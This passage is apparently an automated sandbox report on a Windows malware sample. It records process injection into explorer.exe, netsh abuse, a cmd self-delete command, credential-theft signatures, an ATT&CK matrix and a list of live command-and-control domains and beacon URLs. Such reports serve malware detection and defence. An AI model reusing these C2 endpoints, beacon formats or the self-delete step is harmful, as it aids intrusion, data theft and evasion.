                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Process created: C:\Users\user\Desktop\hOe2JrpIAE.exe "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hOe2JrpIAE.exe"
                Source: explorer.exe, 00000007.00000003.3099099836.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd=
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2008880814.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: explorer.exe, 00000007.00000002.4442723269.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2007472655.0000000001731000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: explorer.exe, 00000007.00000000.2007072938.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4441584000.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PProgman
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Queries volume information: C:\Users\user\Desktop\hOe2JrpIAE.exe VolumeInformation
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_01089B55 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
                Source: C:\Windows\SysWOW64\netsh.exe | Code function: 8_2_010892E8 memset,GetVersionExW
                Source: C:\Users\user\Desktop\hOe2JrpIAE.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Lowering of HIPS / PFW / Operating System Security Settings

                Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"

                Stealing of Sensitive Information

                Source: Yara match | File source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.3f99970.7.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.7140000.12.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.5b50000.10.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.340bcdc.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.33e7f58.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.340acc4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2005358517.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2007353143.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2005886630.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2007470548.0000000007140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2005358517.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match | File source: 6.2.hOe2JrpIAE.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.hOe2JrpIAE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000008.00000002.4442472439.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4441795626.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2005886630.0000000004188000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.4441970832.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.3f99970.7.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.7140000.12.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.5b50000.10.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.3f99970.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.5b50000.10.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.7140000.12.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.340bcdc.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.33e7f58.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.2fc84c8.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.hOe2JrpIAE.exe.340acc4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2005358517.00000000033E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2007353143.0000000005B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2005886630.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2007470548.0000000007140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2005358517.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (numbers preceding a technique are the report's signature counts for that technique)

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Shared Modules | 1 DLL Side-Loading | 612 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 231 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 612 Process Injection | NTDS | 41 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 214 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                [Behavior graph] Behavior Graph ID: 1466892 | Sample: hOe2JrpIAE.exe | Startdate: 03/07/2024 | Architecture: WINDOWS | Score: 100
                Start node: yipicircle.life, www.yipicircle.life, 18 other IPs or domains; signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
                hOe2JrpIAE.exe: dropped C:\Users\user\AppData\...\hOe2JrpIAE.exe.log (ASCII); signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces; started four hOe2JrpIAE.exe child processes
                hOe2JrpIAE.exe (child): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures; injected into explorer.exe
                explorer.exe (injected): www.tiensbangladesh.net 162.244.93.3, 49719, 80 PONYNETUS United States; www.shopusuniform.com 199.59.243.226, 49720, 80 BODIS-NJUS United States; 3 other IPs or domains; signatures: System process connects to network (likely due to code injection or exploit); Uses netsh to modify the Windows network and firewall settings; started netsh.exe
                netsh.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces; started cmd.exe
                cmd.exe: started conhost.exe

                Source | Detection | Scanner | Label | Link
                hOe2JrpIAE.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                hOe2JrpIAE.exe | 100% | Avira | TR/AD.Swotter.gcxmc |
                hOe2JrpIAE.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
yipicircle.life | 3.33.130.190 | true | true |  | unknown
happyjumps.co | 3.33.130.190 | true | true |  | unknown
pa94nj5r.vakcloud.com | 14.128.41.165 | true | true |  | unknown
www.shopusuniform.com | 199.59.243.226 | true | true |  | unknown
www.foton.africa | 52.60.87.163 | true | true |  | unknown
td-ccm-neg-87-45.wixdns.net | 34.149.87.45 | true | true |  | unknown
www.tiensbangladesh.net | 162.244.93.3 | true | true |  | unknown
googleyou.qqdns.shop | 34.92.194.225 | true | true |  | unknown
www.tempotrekstore.com | unknown | unknown | true |  | unknown
www.dehamobilya.com | unknown | unknown | true |  | unknown
www.yipicircle.life | unknown | unknown | true |  | unknown
www.tires-book-robust.bond | unknown | unknown | true |  | unknown
www.j0mui3.shop | unknown | unknown | true |  | unknown
www.happyjumps.co | unknown | unknown | true |  | unknown
www.cgffwelcome.com | unknown | unknown | true |  | unknown
www.e2olyiab.shop | unknown | unknown | true |  | unknown
www.theburnscleanteam.com | unknown | unknown | true |  | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.j0mui3.shop/cn26/?V410V=xh0AWH03uTuLb7lNYJWhmJpAztdjm7ZCIfIRc9jnByUCUf27hW5Mghto8D6CFT3eDifI&Kr=YtxTb | true | Avira URL Cloud: safe | unknown
http://www.shopusuniform.com/cn26/?V410V=Wwa2UMOYo9JcJMQ5ME0Q+bO7/4aNL8yaSIJN/NKFPRQQ6eA3A90uIzxodQffq+AadB6M&Kr=YtxTb | true | Avira URL Cloud: safe | unknown
http://www.yipicircle.life/cn26/?V410V=hM6dqt0bNRJ3wnqohXEckG+ra7BpyCFNN1yCjjYC1YEFAohibEIyfRXhhB3fmL/JtGSj&Kr=YtxTb | true | Avira URL Cloud: safe | unknown
http://www.happyjumps.co/cn26/?V410V=pbSbn1rMiq1OPTP6ICdnvfWphahg9+3Gt5uoQw76hA6d6T1GJ+eKg+Q7XOnjWxnlol53&Kr=YtxTb | true | Avira URL Cloud: safe | unknown
www.tires-book-robust.bond/cn26/ | true | Avira URL Cloud: malware | unknown
http://www.dehamobilya.com/cn26/?V410V=vyOlf6d0gdkMF27YEBTjWR4sd91tQ6met0nuZUZfy4zFrLxX9BwP111ngtT6h4ZwTfCv&Kr=YtxTb | true | Avira URL Cloud: safe | unknown
http://www.tiensbangladesh.net/cn26/?V410V=CmFgnMATfu/lD1Rd1GHYmtbpicIpwpy90rRc4LoWjy4DICrpuFEBTKor21hYt8nWF2kM&Kr=YtxTb | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://word.office.comon | explorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.scientificmetalscorp.co | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tempotrekstore.com/cn26/www.xztyvk.xyz | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.xztyvk.xyz | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yipicircle.life | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.j0mui3.shopReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e2olyiab.shop | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.cgffwelcome.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dehamobilya.com/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sswpdx.com/cn26/www.scientificmetalscorp.co | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://powerpoint.office.comcember | explorer.exe, 00000007.00000000.2012740355.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4450786934.000000000C460000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/DataSet1.xsd | hOe2JrpIAE.exe | false | Avira URL Cloud: safe | unknown
http://www.foton.africa/cn26/www.e2olyiab.shop | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e2olyiab.shop/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000007.00000003.3099099836.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096597969.0000000009B7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4447710215.0000000009B81000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiensbangladesh.net/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.micro | explorer.exe, 00000007.00000000.2010237532.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.4446456942.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.2009741979.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.tiensbangladesh.net | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.scientificmetalscorp.co/cn26/www.ajtsistemas.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sswpdx.com/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.theburnscleanteam.comReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.happyjumps.co/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | explorer.exe, 00000007.00000002.4453541198.0000000010E2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000008.00000002.4443371821.00000000046CF000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.A | explorer.exe, 00000007.00000000.2013207443.000000000C8DD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.B | explorer.exe, 00000007.00000003.3098535056.000000000C8DD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096521466.000000000C8DD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.shopusuniform.com/cn26/www.j0mui3.shop | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.shopusuniform.com/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e2olyiab.shopReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.scientificmetalscorp.coReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.shopusuniform.comReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tires-book-robust.bond/cn26/www.foton.africa | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.theburnscleanteam.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.foton.africa/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.dehamobilya.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.e2olyiab.shop/cn26/www.yipicircle.life | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.happyjumps.co | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ajtsistemas.com/cn26/ | explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript. | explorer.exe, 00000007.00000003.3777555916.000000000C8EB000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tempotrekstore.comReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000007.00000003.3098637821.000000000C513000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4451078883.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2012740355.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ajtsistemas.comReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.foton.africa | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.scientificmetalscorp.co/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/)s | explorer.exe, 00000007.00000002.4446934807.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2010640411.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tires-book-robust.bond | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.happyjumps.coReferer: | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.j0mui3.shop/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiensbangladesh.net/cn26/www.shopusuniform.com | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.theburnscleanteam.com/cn26/ | explorer.exe, 00000007.00000002.4452222485.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094033490.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
